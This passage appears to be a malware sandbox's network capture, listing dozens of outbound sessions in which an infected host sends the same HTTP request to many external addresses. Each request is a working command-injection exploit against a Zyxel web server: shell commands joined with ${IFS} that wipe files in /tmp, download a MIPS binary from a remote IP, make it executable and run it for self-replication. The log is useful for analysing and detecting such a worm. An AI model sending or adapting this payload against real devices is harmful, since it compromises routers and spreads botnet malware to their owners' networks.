                                    Jan 13, 2024 19:02:44.424779892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6944192.168.2.1336940210.148.186.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424844980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6945192.168.2.1340210206.188.20.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424905062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6946192.168.2.1346658202.236.234.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424972057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6947192.168.2.1355902201.23.167.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.424993992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6948192.168.2.134425013.131.118.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425057888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6949192.168.2.135921244.209.33.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425091982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6950192.168.2.1345176123.25.138.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425144911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6951192.168.2.135477444.253.106.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425218105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6952192.168.2.1346128132.152.59.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425234079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6953192.168.2.134923044.149.129.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425292969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6954192.168.2.133968246.37.39.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425401926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6955192.168.2.134611888.251.117.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425437927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6956192.168.2.133278652.115.230.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425497055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6957192.168.2.1347826126.26.214.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425539017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6958192.168.2.136075251.80.157.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425602913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6959192.168.2.1350840174.115.71.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425662994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6960192.168.2.1338634123.254.33.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425679922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6961192.168.2.1354490156.186.231.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425764084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6962192.168.2.1344422200.98.152.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425826073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6963192.168.2.1336972122.131.91.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425863981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6964192.168.2.1356022184.249.138.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425919056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6965192.168.2.1335024195.0.115.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.425945997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6966192.168.2.1351402118.171.254.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426009893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6967192.168.2.1356408194.96.144.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426038980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6968192.168.2.134042453.105.187.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426109076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6969192.168.2.1348978195.119.208.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426146984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6970192.168.2.1334612190.173.82.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426199913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6971192.168.2.133950247.38.22.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426265955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6972192.168.2.135949824.51.217.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426312923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6973192.168.2.1342394152.0.91.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426359892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6974192.168.2.134123493.177.134.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426410913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6975192.168.2.1345872146.242.11.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426481009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6976192.168.2.135734664.221.159.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426557064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6977192.168.2.1354652123.35.106.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426599979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6978192.168.2.1339056172.143.203.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426676989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6979192.168.2.1352138136.123.58.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426743031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6980192.168.2.1339272103.166.129.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426775932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6981192.168.2.135296620.4.54.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426824093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6982192.168.2.1346486205.165.13.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426878929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6983192.168.2.1341198143.94.190.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426948071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6984192.168.2.1342892213.136.51.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.426975012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6985192.168.2.13602421.68.114.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427032948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6986192.168.2.1358378205.22.174.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427088022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6987192.168.2.1354900207.206.71.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427186966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6988192.168.2.1359186161.18.228.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427218914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6989192.168.2.1337198210.211.49.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427256107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6990192.168.2.1344504106.178.161.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427325010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6991192.168.2.134531078.195.147.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427349091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6992192.168.2.134258032.117.77.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427381992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6993192.168.2.135178057.217.6.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427454948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6994192.168.2.134149296.160.62.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427498102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6995192.168.2.1350624126.17.67.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427594900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6996192.168.2.135862637.138.175.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427607059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6997192.168.2.135778266.66.54.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427678108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6998192.168.2.1354430134.134.58.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427726030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6999192.168.2.1345542100.48.170.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427788973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7000192.168.2.1332980138.15.213.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427833080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7001192.168.2.1336456135.211.225.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427918911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7002192.168.2.1341124129.172.98.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427957058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7003192.168.2.1351116148.164.153.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.427997112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7004192.168.2.133441412.185.254.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428059101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7005192.168.2.1337874110.31.110.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428122997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7006192.168.2.133615677.203.245.138443
                                    TimestampBytes transferredDirectionData
